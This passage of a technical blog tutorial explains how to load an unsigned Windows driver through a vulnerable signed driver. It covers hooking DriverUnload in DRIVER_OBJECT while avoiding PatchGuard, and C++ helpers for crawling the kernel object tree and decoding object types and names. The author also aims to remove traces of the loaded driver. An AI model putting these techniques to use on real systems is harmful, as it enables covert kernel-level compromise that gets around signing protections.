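There is also a middle ground if the number of kernel reads is the concern. The PE specification states that the export name pointer table is ordered lexically precisely so that it can be binary searched, which would cut the name reads per lookup from NumberOfNames down to roughly log2 of that. The sketch below is an assumption-laden illustration and not what KGetProcAddress above does: FindExportNameIndex is a hypothetical name, nameAt stands in for "read the i-th exported name through the KernelPtr", and it relies on the module actually honouring the ordering (with a plain byte-wise, case-sensitive comparison). If in doubt, the linear scan is the safe fallback.

```cpp
#include <cassert>
#include <cstdint>
#include <functional>
#include <optional>
#include <string>

// nameAt(i) is a hypothetical callback returning the i-th name in the export
// name pointer table, e.g. by reading it from kernel memory.
std::optional<std::uint32_t> FindExportNameIndex(
    std::uint32_t numberOfNames,
    const std::string& wanted,
    const std::function<std::string(std::uint32_t)>& nameAt)
{
    std::uint32_t lo = 0;
    std::uint32_t hi = numberOfNames; // search the half-open range [lo, hi)

    while (lo < hi)
    {
        const std::uint32_t mid = lo + (hi - lo) / 2;
        const int cmp = nameAt(mid).compare(wanted);

        if (cmp == 0)
        {
            return mid; // index into the name table, and so into the ordinal table
        }

        if (cmp < 0)
        {
            lo = mid + 1;
        }
        else
        {
            hi = mid;
        }
    }

    return std::nullopt;
}
```

The returned index plays the same role as i in the loop above: it is used to read the matching entry from AddressOfNameOrdinals, which in turn indexes AddressOfFunctions.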

Okay, let’s recap!

We have:

Allocated our PE memory region in kernel
Copied in the PE headers
Copied in the PE sections
Processed the PE relocations
Processed the PE imports

The only thing we arguably haven’t done yet is register the unsigned driver’s exception data (if it has any) with the inverted function tables, which is necessary for SEH to work in the driver (in its current state, if it throws an exception it’ll blue screen the box). This step is a bit more complicated and requires calling functions in kernel space, so we’ll defer this work to when we actually have execution in kernel! So what’s left?

Getting Execution in Kernel!

Turning a kernel memory primitive into execution isn’t trivial. The standard approach is to patch a hook into a rarely used kernel function and trigger a call to it from user-mode. The issue with this is that there is no guarantee the hook won’t be triggered multiple times, so suddenly you have some rather unpleasant concurrency issues to deal with. You also want to avoid patching any memory that would trigger Kernel Patch Protection (KPP, also known as PatchGuard), a kernel system that periodically and randomly checks that various regions of memory haven’t been tampered with. Triggering PatchGuard will result in a BSOD (blue screen of death) and crash the machine. Although the patch would only be written in for a short period of time, and you’d be unlikely to trigger a PatchGuard fault, I’m personally not a gambling man and prefer a more stable option.

The question then becomes, what part of kernel likely isn’t being used by anyone else and also isn’t protected by PatchGuard?

The first answer may not be immediately obvious but what about the vulnerable driver we loaded for the kernel primitive?! Given that we loaded it to exploit our way into kernel I think we can be fairly confident nothing else on the system is using it! Okay perfect! But what part of the vulnerable driver can we patch? Say it with me: The DRIVER_OBJECT structure!!!

Woahh slow down there, what is the DRIVER_OBJECT structure?

Okay, backtracking slightly, when a driver is loaded normally into kernel it has to expose a DriverEntry function akin to a user-mode dll’s DllMain function. The function prototype for a DriverEntry looks something like:

NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)

You can read about DRIVER_OBJECT structure here & the requirements & responsibilities of a DriverEntry function here! To summarize:

The I/O manager creates a DRIVER_OBJECT structure for each driver that has been installed and loaded.
The I/O manager passes this structure to the driver’s DriverEntry routine during initialization.
The DriverEntry routine is responsible for filling out parts of this structure such as the MajorFunction array pointing to its dispatch routines for IRP_MJ_XXX requests.
If a driver supports being unloaded it can also fill out its DriverUnload field in the DRIVER_OBJECT structure.
The I/O manager uses the DRIVER_OBJECT structure to register and track information about the loaded images of drivers.

There’s a couple of interesting candidates for us to patch here!

If a driver registers a device to allow I/O control codes to be sent to it from user-mode then it is guaranteed to have filled out the entry in the MajorFunction table corresponding to IRP_MJ_DEVICE_CONTROL. Additionally if a driver supports being unloaded (which the majority do), then it will have also filled out its DriverUnload routine.

A quick aside on PatchGuard: PatchGuard is largely undocumented (which is sort of the point), although quite a few people have worked on reverse engineering the code and structures to understand how it works. From what I can tell, PatchGuard does protect the DRIVER_OBJECT structure of at least some drivers, although I believe it’s only core Windows drivers whose DRIVER_OBJECT structures are initialized early in the Windows load process and have no need to change, such as ntfs.sys. I don’t currently think that 3rd party drivers’ DRIVER_OBJECT structures are protected by PatchGuard, but I don’t want to make that claim in this blog given that I am not 100% certain.

Given that we likely want to unload our vulnerable driver when we’re done, to remove any traces of our unsigned driver having been loaded, I decided to go down the route of hooking the DriverUnload routine in the DRIVER_OBJECT structure. So how do we find where this DRIVER_OBJECT structure is? Well, this turned into a much bigger adventure than I originally anticipated! Many DriverEntry routines save off a pointer to their DRIVER_OBJECT structure, which means that as long as you know where your vulnerable driver is loaded and the RVA at which it saves this pointer, it would be trivial to find. However, not all drivers do this and I don’t want to make that assumption in this blog, so the alternative is to use a method that should work for all vulnerable drivers but is a bit more involved….

Driver Devices

I’ve made a few assumptions about your (the reader’s) knowledge. Frankly, trying to write this blog from the standpoint of assuming you know nothing about Windows or what the kernel is would probably be novel worthy (and to be honest this blog is getting that way already). Given I’ve assumed you have a kernel primitive to hand, I also assumed you probably knew about driver device objects and IOCTLs (I/O Control Codes), but in the interest of keeping this blog accessible to the widest audience possible I’ll do a quick recap here.

When writing a driver you often want to expose functionality to user-mode. For example, say a motherboard manufacturer has some RGB LEDs on the board and they want to allow the user to change the colour. Typically you’d need a motherboard driver that can talk to the hardware to tell it what colour the LED needs to be, but you’d probably ship a fancy user-mode GUI so that it’s easy for end users to change that colour. So you have some functionality available in the kernel that you want to expose to user-mode. This is typically implemented via device I/O control codes, or IOCTLs for short. So how does this work?

In Kernel

In your driver’s DriverEntry routine you call IoCreateDevice to create a device & an associated DEVICE_OBJECT structure. A device object represents a logical, virtual or physical device for which a driver handles I/O requests. Referring back to our example our motherboard driver would want to create a motherboard device object for which it can handle I/O requests. You can read more about this here.
You call IoCreateSymbolicLink to create a symbolic link for the device which is accessible from user-mode.
You populate the DRIVER_OBJECT’s MajorFunction table to handle IRP_MJ_CREATE/IRP_MJ_CLOSE requests, which deal with handles being opened and closed for the driver’s device, and then you also populate the dispatch routine for handling IRP_MJ_DEVICE_CONTROL requests, which is the dispatch routine fired when IOCTLs are sent to your device.

In User-Mode

You call CreateFile to open a handle to the device represented by the symbolic link, i.e. \\.\MotherboardLink, which is a symbolic link for \Device\Motherboard
You then call DeviceIoControl using that handle to send control codes (along with an in and/or out buffer) to the device object
These control codes will then be handled in kernel by the dispatch routine registered for IRP_MJ_DEVICE_CONTROL. So in our example the motherboard driver will likely have a special control code for changing the LED colour and the buffer sent down to the driver may simply have the RGB values stored in it.
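As a small aside, the control codes themselves aren’t arbitrary numbers. The Windows headers build them with the CTL_CODE macro, which packs a device type, a required access level, a function number and a transfer method into a single 32-bit value. The sketch below re-implements that packing as a portable constexpr function so you can follow it without the WDK to hand. MakeIoctl, the k-prefixed constant names and the "set LED colour" function number are all made up for this example; our imaginary motherboard driver could pick any vendor-range function number it likes.

```cpp
#include <cstdint>

// Portable re-implementation of the CTL_CODE macro from the Windows headers:
//   bits 31..16 device type, bits 15..14 required access,
//   bits 13..2  function number, bits 1..0 transfer method
constexpr std::uint32_t MakeIoctl(std::uint32_t deviceType, std::uint32_t function,
                                  std::uint32_t method, std::uint32_t access)
{
    return (deviceType << 16) | (access << 14) | (function << 2) | method;
}

// Values copied from the Windows headers
constexpr std::uint32_t kFileDeviceUnknown = 0x22; // FILE_DEVICE_UNKNOWN
constexpr std::uint32_t kMethodBuffered    = 0;    // METHOD_BUFFERED
constexpr std::uint32_t kFileAnyAccess     = 0;    // FILE_ANY_ACCESS

// Hypothetical control code for the imaginary motherboard driver. Function
// numbers from 0x800 upwards are the range left open for vendor-defined codes.
constexpr std::uint32_t kIoctlSetLedColour =
    MakeIoctl(kFileDeviceUnknown, 0x800, kMethodBuffered, kFileAnyAccess);

static_assert(kIoctlSetLedColour == 0x222000, "unexpected IOCTL encoding");
```

This is why so many third party drivers use control codes that start with 0x222: they were declared as FILE_DEVICE_UNKNOWN with buffered I/O and no access restrictions.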

When we talk about vulnerable drivers, it’s usually because they provide poorly implemented control code handlers. Driver writers usually only expect their driver to be called by their own software. For example, they may provide a control code which memcpys data around, but there may be a way for us to send an unexpected buffer format that allows us to control the pointers and size used by memcpy. In that case, assuming they didn’t bounds check any pointers, we’d be able to call that poorly implemented control code handler to copy data both out of and into kernel, essentially giving us a kernel read/write primitive!
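To make that a bit more concrete, here is a toy model of such a handler. It runs entirely in one ordinary process and isn’t taken from any real driver: CopyRequest, HandleCopyIoctl, ReadQword and WriteQword are all names invented for this sketch. The point is just to show that when the caller controls both pointers and the size, one careless memcpy gives you a read primitive and a write primitive at the same time.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>

// Hypothetical request layout that a careless driver might accept from user-mode
struct CopyRequest
{
    void*       destination;
    const void* source;
    std::size_t size;
};

// Stand-in for the driver's IRP_MJ_DEVICE_CONTROL handler. Note what is missing:
// no check that either pointer lies inside a buffer the driver owns, and no limit on size.
inline void HandleCopyIoctl(const CopyRequest& request)
{
    std::memcpy(request.destination, request.source, request.size);
}

// The caller picks the direction of the copy, so one handler provides both primitives
inline std::uint64_t ReadQword(const void* address)
{
    std::uint64_t value = 0;
    HandleCopyIoctl({ &value, address, sizeof(value) });
    return value;
}

inline void WriteQword(void* address, std::uint64_t value)
{
    HandleCopyIoctl({ address, &value, sizeof(value) });
}
```

In the real thing the request would travel through DeviceIoControl and the memcpy would run in kernel, but the shape of the bug is the same.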

So why am I explaining all of this? Well, we want to patch a routine in the DRIVER_OBJECT structure of the vulnerable driver we loaded but we need to find it first. Given drivers need to register a device object to be communicated with from user-mode (which is how most vulnerable drivers are exploited) and I’m assuming you’re exploiting your vulnerable driver via DeviceIoControl, it then follows that your vulnerable driver will have a DEVICE_OBJECT structure in kernel somewhere too! So why does that matter? Well, it turns out that DEVICE_OBJECT structures are a little easier/more consistent to find than DRIVER_OBJECT structures and if you look at the definition of a DEVICE_OBJECT here, you’ll see that it handily has a pointer to the DRIVER_OBJECT structure of the driver that created the device!

Okay, so how do we go about finding the DEVICE_OBJECT?

It turns out that Windows stores all kernel objects in a tree-like structure, which you can browse using a useful tool like WinObj. Under the root object “\” we then have directories for various object types like driver and device objects. If there’s a folder pointing to all of the driver objects then why are we looking for the device object first? Again, going back to my assumption that you are exploiting your vulnerable driver via IOCTLs, you needed to know the name of the symbolic link to call CreateFile and open a handle to the device before you could even send it an IOCTL in the first place! So given that you already know the name of the symbolic link, we can use a tool like WinObj to find out which device the symbolic link points to!

For example, in this screenshot we can see that the symbolic link \\.\Dfs is a symbolic link to the device \Device\DfsClient. The driver object name, on the other hand, comes from the name of the service backing the driver, which is subject to change. Service? Okay, so when you load a driver normally on Windows you create a service of type SERVICE_KERNEL_DRIVER and you set the service binary as the actual driver .sys file. The name of the service is then used as the name of the driver object that represents that driver. So if you registered the driver using a service of a different name, the name of the driver object you’re looking for would also change. This is another reason to prefer looking for the device object, which is registered by code in the driver that won’t change even if the name of the service does.

Okay, so we’ve decided to look for the device object pointed to by the symbolic link, say for example the device path is \Device\VulnerableDriver, how do we find the address of this kernel mode structure from user mode?

Crawling the Kernel Object Tree

Remember the kernel offset structure we defined right at the start? It had a member called rvaObpRootDirectoryObject, which is the RVA of the ntoskrnl.exe’s private symbol ObpRootDirectoryObject. The pointer stored at this address points us at the root directory object of the kernel object tree! Awesome! So how do we crawl it?

Well, first we need to talk a little bit about the Kernel Object Manager which owns the kernel object tree. The Windows Kernel Object Manager is the component responsible for managing all of the resources in Windows. Objects are essentially data structures that represent system resources. The object manager, however, treats each object as an opaque data structure that it has been asked to provide, manage, and even guard, but not interpret. To perform its various responsibilities it still needs to store some state about each opaque object it is responsible for. It does this by allocating some additional memory in front of the opaque object structure to store an OBJECT_HEADER. Everything that the object manager needs to know about the object for its own purposes is reached via this OBJECT_HEADER. The other side of the coin is that the owner and users of the objects need not and should not interpret the OBJECT_HEADER. The result is that when an object is allocated by the object manager it returns the pointer to the opaque data blob, NOT a pointer to the OBJECT_HEADER. We, however, need to walk the object tree, and to do this we need to access and inspect the object headers to figure out what kind of object we’re looking at!

It all starts then with the root directory object. The opaque data for this object type is an OBJECT_DIRECTORY structure, and in this case, because we know it’s the root directory object, we didn’t have to go snooping around in the OBJECT_HEADER structure to figure that out. The OBJECT_DIRECTORY structure is an object type used by the object manager itself for representing a directory in the object namespace. It is simply a container of other objects, including more directory objects. Let’s take a quick look at the structure:

struct _OBJECT_DIRECTORY
{
    struct _OBJECT_DIRECTORY_ENTRY* HashBuckets[37];                        //0x0
    struct _EX_PUSH_LOCK Lock;                                              //0x128
    struct _DEVICE_MAP* DeviceMap;                                          //0x130
    struct _OBJECT_DIRECTORY* ShadowDirectory;                              //0x138
    VOID* NamespaceEntry;                                                   //0x140
    VOID* SessionObject;                                                    //0x148
    ULONG Flags;                                                            //0x150
    ULONG SessionId;                                                        //0x154
};

The OBJECT_DIRECTORY structure stores all of the child objects in hash buckets, which are singly linked lists of the child objects. The benefit here is that instead of having one massively long list of child objects we have 37 shorter lists and a quick hashing algorithm to figure out which of the 37 shorter lists to place an object in. Obviously the hashing algorithm needs to have a fairly uniform distribution to ensure that all 37 lists grow fairly consistently, but it brings with it a fairly sizeable performance increase. Now, we could try and figure out the hash function so we know which hash bucket to look in for the object we care about, but it’s liable to change between Windows versions, and the much more stable and simpler approach is to just search through all 37 hash buckets. Right, so what are we looking for? Well, the first object we’re looking for is another directory object called ‘Device’ which holds all of the kernel device objects. Let’s just quickly take a look at the OBJECT_DIRECTORY_ENTRY responsible for the singly linked lists:

struct _OBJECT_DIRECTORY_ENTRY
{
    struct _OBJECT_DIRECTORY_ENTRY* ChainLink;                              //0x0
    VOID* Object;                                                           //0x8
    ULONG HashValue;                                                        //0x10
};

So we have a chain link to the next item in the singly linked list, a pointer to an object and then the computed hash value. So to walk the hash buckets we iterate over each hash bucket individually then for each OBJECT_DIRECTORY_ENTRY we inspect the object inside and then also walk the chain link until we find the end of the singly linked list (typically indicated by a null value for the ChainLink field). Now we finally hit our issue however, as now all we have is a bunch of opaque objects to inspect and we have no idea which ones are even directory objects, let alone what the name of each object is!!!
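Here’s a minimal sketch of that walk. To keep it runnable anywhere it operates on trimmed-down copies of the two structures living in ordinary process memory, so ObjectDirectory, ObjectDirectoryEntry and CollectDirectoryObjects are stand-ins I’ve made up for this example. In the actual loader every pointer dereference below would be a kernel read through our KernelPtr instead.

```cpp
#include <cstddef>
#include <vector>

// Trimmed-down copies of the two structures above, only the fields the walk needs
struct ObjectDirectoryEntry
{
    ObjectDirectoryEntry* ChainLink; // next entry in this bucket, nullptr at the end
    void*                 Object;    // the opaque object body
};

constexpr std::size_t kHashBucketCount = 37;

struct ObjectDirectory
{
    ObjectDirectoryEntry* HashBuckets[kHashBucketCount];
};

// Collect every object pointer stored in a directory by visiting all 37 buckets
// and following each bucket's ChainLink list until it terminates.
inline std::vector<void*> CollectDirectoryObjects(const ObjectDirectory& directory)
{
    std::vector<void*> objects;
    for (const ObjectDirectoryEntry* bucket : directory.HashBuckets)
    {
        for (const ObjectDirectoryEntry* entry = bucket; entry != nullptr; entry = entry->ChainLink)
        {
            objects.push_back(entry->Object);
        }
    }
    return objects;
}
```

Empty buckets simply hold a null pointer, so the inner loop falls straight through for them.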

Snooping the OBJECT_HEADER

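For each object pointer we encounter, to figure out what we’re looking at we can start by stepping back to the start of its OBJECT_HEADER (the object pointer points at the header’s Body field, so the header begins 0x30 bytes before it) and then inspecting the header, which looks something like: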

struct _OBJECT_HEADER
{
    LONGLONG PointerCount;                                                  //0x0
    union
    {
        LONGLONG HandleCount;                                               //0x8
        VOID* NextToFree;                                                   //0x8
    };
    struct _EX_PUSH_LOCK Lock;                                              //0x10
    UCHAR TypeIndex;                                                        //0x18
    union
    {
        UCHAR TraceFlags;                                                   //0x19
        struct
        {
            UCHAR DbgRefTrace : 1;                                            //0x19
            UCHAR DbgTracePermanent : 1;                                      //0x19
        };
    };
    UCHAR InfoMask;                                                         //0x1a
    union
    {
        UCHAR Flags;                                                        //0x1b
        struct
        {
            UCHAR NewObject : 1;                                              //0x1b
            UCHAR KernelObject : 1;                                           //0x1b
            UCHAR KernelOnlyAccess : 1;                                       //0x1b
            UCHAR ExclusiveObject : 1;                                        //0x1b
            UCHAR PermanentObject : 1;                                        //0x1b
            UCHAR DefaultSecurityQuota : 1;                                   //0x1b
            UCHAR SingleHandleEntry : 1;                                      //0x1b
            UCHAR DeletedInline : 1;                                          //0x1b
        };
    };
    ULONG Reserved;                                                         //0x1c
    union
    {
        struct _OBJECT_CREATE_INFORMATION* ObjectCreateInfo;                //0x20
        VOID* QuotaBlockCharged;                                            //0x20
    };
    VOID* SecurityDescriptor;                                               //0x28
    struct _QUAD Body;                                                      //0x30
};

As previously mentioned this contains or points to all of the information which the object manager needs to keep track of for this object. Now, given we’re looking for another directory object we can start eliminating candidate objects by inspecting the object type! So, how do we figure out what type of object this is? It all starts with the TypeIndex field. Historically, the TypeIndex field is an index into an array of pointers called the type index table where each pointer points to an OBJECT_TYPE structure:

struct _OBJECT_TYPE
{
    struct _LIST_ENTRY TypeList;                                            //0x0
    struct _UNICODE_STRING Name;                                            //0x10
    VOID* DefaultObject;                                                    //0x20
    UCHAR Index;                                                            //0x28
    ULONG TotalNumberOfObjects;                                             //0x2c
    ULONG TotalNumberOfHandles;                                             //0x30
    ULONG HighWaterNumberOfObjects;                                         //0x34
    ULONG HighWaterNumberOfHandles;                                         //0x38
    struct _OBJECT_TYPE_INITIALIZER TypeInfo;                               //0x40
    struct _EX_PUSH_LOCK TypeLock;                                          //0xb8
    ULONG Key;                                                              //0xc0
    struct _LIST_ENTRY CallbackList;                                        //0xc8
};

Which contains, among other things, the Name of the type! This leaves us with a few questions:

1. Where is this type index table?
2. Why did I use the phrase ‘historically’?

Let’s start with 1. Remember that kernel offsets structure again? It contained another member called rvaObTypeIndexTable, which is the RVA into ntoskrnl.exe of the ObTypeIndexTable symbol, which, you guessed it, is the location of the type index table itself (the array of pointers to OBJECT_TYPE structures)!! Phew, that was an easy one! Okay, but why did I use the word ‘historically’? Well, the TypeIndex field used to contain the actual index into the array, but in Windows 10 that changed, it’s now an encoded index… Okay, so how do we decode the index? For that we can take a look at the function ObGetObjectType, which is a kernel mode function that looks up the type of an object, which is exactly what we’re trying to replicate in our user-mode driver loader. It turns out that in Windows 10 we need to:

1. Grab the memory address of the OBJECT_HEADER for the object we’re inspecting
2. XOR the value in the TypeIndex field with the second least significant byte of that address
3. XOR that result with the byte stored at the symbol ObHeaderCookie
4. We now have our type index!

So now the 3rd and final field in our kernel offsets structure comes into play, we also had a member called rvaObHeaderCookie which is the RVA into ntoskrnl.exe of the ObHeaderCookie symbol which contains the special byte we need for the XOR in step 3! The code for decoding an object type index looks something like this:

size_t ObGetObjectType(KernelPtr& ptr, void* objectAddress, const KernelOffsets& offsets)
{
    /*
        Use offset from hashmap to grab object header cookie
        
        Note, the KernelPtr object passed in this method is 'based' on NtosKrnl.exe's base address
        which we found from our KGetModuleHandle implementation we showed earlier. So 'setting' the
        KernelPtr to the RVA we have is simply adding the RVA to the base address of ntoskrnl.
        
        We can then dereference the byte at that address to get the ObHeader Cookie
    */
    BYTE ObHeaderCookie = *ptr.set(offsets.rvaObHeaderCookie);

    // Calculate the address of the OBJECT_HEADER structure, annoyingly the OBJECT_HEADER structure has a field member
    // for referring to the object body so we need to subtract that from the size of the object header structure
    void* pObjectHeaderAddress = reinterpret_cast<byte*>(objectAddress) - (sizeof(_OBJECT_HEADER) - sizeof(_OBJECT_HEADER::Body));

    // We also need to grab the OBJECT_HEADER from kernel so we can read the TypeIndex field
    _OBJECT_HEADER header = *ptr.set(pObjectHeaderAddress);

    // Finally we can calculate the real TypeIndex value
    return ObHeaderCookie ^ header.TypeIndex ^ ((reinterpret_cast<UINT_PTR>(pObjectHeaderAddress) & 0xFF00) >> 8);
}
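If you want to sanity check the arithmetic without touching a kernel, the decode is easy to reproduce on paper. The sketch below is a standalone version using plain integers. ObjectHeaderAddress and DecodeTypeIndex are names I’ve picked for this example, the 0x30 comes from the offset of Body in the OBJECT_HEADER dump above, and the sample address, encoded index and cookie are invented values, not ones read from a real system.

```cpp
#include <cstdint>

// Offset of the Body field inside OBJECT_HEADER, taken from the structure dump above.
// The header therefore starts this many bytes before the object pointer.
constexpr std::uint64_t kObjectHeaderBodyOffset = 0x30;

constexpr std::uint64_t ObjectHeaderAddress(std::uint64_t objectAddress)
{
    return objectAddress - kObjectHeaderBodyOffset;
}

// Decode an encoded TypeIndex: XOR it with the second least significant byte of the
// header address and with the ObHeaderCookie byte.
constexpr std::uint8_t DecodeTypeIndex(std::uint64_t headerAddress,
                                       std::uint8_t encodedIndex,
                                       std::uint8_t cookie)
{
    return static_cast<std::uint8_t>(encodedIndex ^ ((headerAddress >> 8) & 0xFF) ^ cookie);
}

// Made-up sample values, not taken from a real system
constexpr std::uint64_t kSampleObject = 0xFFFF8A01123456A0;
constexpr std::uint64_t kSampleHeader = ObjectHeaderAddress(kSampleObject);

static_assert(kSampleHeader == 0xFFFF8A0112345670, "header precedes the body by 0x30 bytes");
// The address byte is 0x56, so 0x3B ^ 0x56 ^ 0x6E == 0x03
static_assert(DecodeTypeIndex(kSampleHeader, 0x3B, 0x6E) == 0x03, "decoded index mismatch");
```

Because XOR is its own inverse, running the same function on a decoded index gives you back the encoded value, which is handy when checking your numbers against a debugger.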

At this point, for any given object we now know how to find the correct TypeIndex into the type index table, so now we need to go grab the name of the type!

std::wstring ObGetObjectTypeName(KernelPtr& ptr, size_t index, const KernelOffsets& offsets)
{
    // Grab the RVA of the type index table symbol
    DWORD rvaObTypeIndexTable = offsets.rvaObTypeIndexTable;
        
    // Add the index multiplied by the sizeof(void*) as we're indexing into an array of pointers
    DWORD rva = rvaObTypeIndexTable + static_cast<DWORD>(sizeof(void*) * index);
        
    // 'set' the KernelPtr object based on ntoskrnl's base address which is just adding this RVA to that base address
    // Then dereference the KernelPtr object to read the pointer to the OBJECT_TYPE structure from kernel
    void* pObjectType = *ptr.set(rva);
        
    // Set the KernelPtr again to move it, this time because we're passing a void* and not a DWORD it just
    // moves to the absolute address pObjectType rather than adding it as an RVA
    _OBJECT_TYPE objectType = *ptr.set(pObjectType);
        
    // Again move our kernel pointer to the buffer pointed to by the name field in the OBJECT_TYPE structure
    // Then dereference it to read that string from kernel
    std::wstring typeName = *ptr.set(objectType.Name.Buffer);
    
    // Given that UNICODE_STRING structures aren't guaranteed to be null terminated we need to correctly
    // resize our string we read from kernel to chop off any unwanted data. (Our kernel string read just reads
    // until a null is found which means we may have read too much)
    typeName.resize(objectType.Name.Length / sizeof(wchar_t));
        
    // Finally we can return the type name we pulled from kernel
    return typeName;
}
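The read-until-null-then-trim approach above works with the string read we built last time, but the underlying idea is simply that a UNICODE_STRING is a counted string: Length is a byte count and nothing promises a terminator. As a hedged illustration of that, here is a portable sketch that builds a string from exactly Length bytes. CountedString and ToString are invented for this example, and I’ve used char16_t rather than wchar_t so the character size matches Windows on any platform.

```cpp
#include <cstddef>
#include <cstdint>
#include <string>

// Same idea as UNICODE_STRING: Length and MaximumLength are byte counts, not character counts
struct CountedString
{
    std::uint16_t   Length;        // bytes in use, excluding any terminator
    std::uint16_t   MaximumLength; // bytes allocated for Buffer
    const char16_t* Buffer;        // not guaranteed to be null terminated
};

// Build a string from exactly Length bytes, never looking for a terminator
inline std::u16string ToString(const CountedString& counted)
{
    return std::u16string(counted.Buffer, counted.Length / sizeof(char16_t));
}
```

If your kernel primitive can do sized reads, reading Length bytes directly like this avoids pulling back whatever happens to follow the string in memory.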

Nice! So at this point when we encounter an object we can grab its type name. This means that, given we’re looking for a directory object, we can limit our search to objects that have a type name of "Directory". Okay, but say that we find an object of type "Directory", how do we know if it’s the "Device" directory object? Well, for that, we now need to figure out how to find an object’s name. Let’s take another look at the OBJECT_HEADER:

struct _OBJECT_HEADER
{
    LONGLONG PointerCount;                                                  //0x0
    union
    {
        LONGLONG HandleCount;                                               //0x8
        VOID* NextToFree;                                                   //0x8
    };
    struct _EX_PUSH_LOCK Lock;                                              //0x10
    UCHAR TypeIndex;                                                        //0x18
    union
    {
        UCHAR TraceFlags;                                                   //0x19
        struct
        {
            UCHAR DbgRefTrace : 1;                                            //0x19
            UCHAR DbgTracePermanent : 1;                                      //0x19
        };
    };
    UCHAR InfoMask;                                                         //0x1a
    union
    {
        UCHAR Flags;                                                        //0x1b
        struct
        {
            UCHAR NewObject : 1;                                              //0x1b
            UCHAR KernelObject : 1;                                           //0x1b
            UCHAR KernelOnlyAccess : 1;                                       //0x1b
            UCHAR ExclusiveObject : 1;                                        //0x1b
            UCHAR PermanentObject : 1;                                        //0x1b
            UCHAR DefaultSecurityQuota : 1;                                   //0x1b
            UCHAR SingleHandleEntry : 1;                                      //0x1b
            UCHAR DeletedInline : 1;                                          //0x1b
        };
    };
    ULONG Reserved;                                                         //0x1c
    union
    {
        struct _OBJECT_CREATE_INFORMATION* ObjectCreateInfo;                //0x20
        VOID* QuotaBlockCharged;                                            //0x20
    };
    VOID* SecurityDescriptor;                                               //0x28
    struct _QUAD Body;                                                      //0x30
};

The field we’re interested in now is the InfoMask field. Though an OBJECT_HEADER precedes every object, the object manager has some additional optimizations. Some data is only required for certain objects, so it is stored in optional structures that precede the OBJECT_HEADER only when they are required, and the InfoMask field tells us which of these optional structures are present! It’s not enough however just to know which structures precede the OBJECT_HEADER, we also need to know what order they are in! It turns out the order of the structures is determined by the order of the bits in the InfoMask, with the structure for the lowest set bit sitting closest to the OBJECT_HEADER. Let’s start by just taking a quick look at what flags can be set in the InfoMask:

0x01    OBJECT_HEADER_CREATOR_INFO
0x02    OBJECT_HEADER_NAME_INFO 
0x04    OBJECT_HEADER_HANDLE_INFO
0x08    OBJECT_HEADER_QUOTA_INFO
0x10    OBJECT_HEADER_PROCESS_INFO
0x20    OBJECT_HEADER_AUDIT_INFO
0x40    OBJECT_HEADER_HANDLE_REVOCATION_INFO

We’re interested in the OBJECT_HEADER_NAME_INFO structure! So, first we need to check that the actual bit is set in the InfoMask, then we need to calculate the stepback to find the structure. Now, if the bit flag is also set for the OBJECT_HEADER_CREATOR_INFO structure then this will be the first structure preceding the OBJECT_HEADER so we’ll have to step back past this structure to the OBJECT_HEADER_NAME_INFO structure. If the bit isn’t set then the OBJECT_HEADER_NAME_INFO will be the first structure preceding the OBJECT_HEADER. I.e. the object memory layout would either be ...[OBJECT_HEADER_NAME_INFO][OBJECT_HEADER_CREATOR_INFO][OBJECT_HEADER]... if the OBJECT_HEADER_CREATOR_INFO flag is also set, or it would be just ...[OBJECT_HEADER_NAME_INFO][OBJECT_HEADER]... if only the OBJECT_HEADER_NAME_INFO is set. Lastly let’s take a look at the OBJECT_HEADER_NAME_INFO structure:

struct _OBJECT_HEADER_NAME_INFO
{
    struct _OBJECT_DIRECTORY* Directory;                                    //0x0
    struct _UNICODE_STRING Name;                                            //0x8
    LONG ReferenceCount;                                                    //0x18
    ULONG Reserved;                                                         //0x1c
};

Again, what we care about here is the Name field. Okay, now we’re ready to take a look at it all put together:

std::wstring ObGetObjectName(KernelPtr& ptr, void* objectAddress)
{
    std::wstring retval;
        
    // First grab the address of the OBJECT_HEADER by stepping back from the object pointer
    void* pObjectHeaderAddress = reinterpret_cast<byte*>(objectAddress) - (sizeof(_OBJECT_HEADER) - sizeof(_OBJECT_HEADER::Body));
        
    // Read the OBJECT_HEADER from kernel
    _OBJECT_HEADER header = *ptr.set(pObjectHeaderAddress);
        
    // Check to see if this object even has a name! Remember this isn't a mandatory structure for all objects
    if (header.InfoMask & FLAG_OBJECT_HEADER_NAME_INFO)
    {
        // This object has a name!
        
        // Calculate the stepback, remembering we have to step back over the _OBJECT_HEADER_CREATOR_INFO structure if the flag for it is set
        DWORD stepback = (header.InfoMask & FLAG_OBJECT_HEADER_CREATOR_INFO) ? sizeof(_OBJECT_HEADER_CREATOR_INFO) : 0;
        stepback += sizeof(_OBJECT_HEADER_NAME_INFO);
                
        // Move our KernelPtr to the calculated address and dereference it to read the _OBJECT_HEADER_NAME_INFO structure
        _OBJECT_HEADER_NAME_INFO nameInfo = *ptr.set(reinterpret_cast<byte*>(pObjectHeaderAddress) - stepback);
                
        // Read the wide string from kernel from the buffer pointed to by the name field
        std::wstring objName = *ptr.set(nameInfo.Name.Buffer);
        // Remember to resize it given that our kernel string read reads until a null byte but UNICODE_STRING strings aren't guaranteed to be null terminated
        objName.resize(nameInfo.Name.Length / sizeof(wchar_t));
        
        // Finally we can return the object name!
        retval = objName;
    }

    return retval;
}
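The function above only needs to worry about the creator info because the name info is the second bit in the InfoMask. If you ever need one of the later structures, the same rule generalises: add up the sizes of every optional structure that is present and whose bit is at or below the one you want. The sketch below shows that calculation. Be aware that the structure sizes in the table are my assumption for 64-bit Windows 10 and should be checked against symbols for your build, and that InfoMaskBit, kOptionalHeaderSizes and OptionalHeaderStepback are names made up for this example.

```cpp
#include <cstddef>
#include <cstdint>

// InfoMask bits from the table above, lowest bit = structure closest to the OBJECT_HEADER
enum InfoMaskBit : std::uint8_t
{
    CreatorInfo = 0x01,
    NameInfo    = 0x02,
    HandleInfo  = 0x04,
    QuotaInfo   = 0x08,
    ProcessInfo = 0x10,
};

// ASSUMPTION: structure sizes for 64-bit Windows 10, verify against symbols for your build
constexpr std::size_t kOptionalHeaderSizes[] = {
    0x20, // OBJECT_HEADER_CREATOR_INFO
    0x20, // OBJECT_HEADER_NAME_INFO
    0x10, // OBJECT_HEADER_HANDLE_INFO
    0x20, // OBJECT_HEADER_QUOTA_INFO
    0x10, // OBJECT_HEADER_PROCESS_INFO
};

// Distance in bytes from the OBJECT_HEADER back to the start of the requested optional
// structure, or 0 if that structure is not present for this object.
inline std::size_t OptionalHeaderStepback(std::uint8_t infoMask, InfoMaskBit wanted)
{
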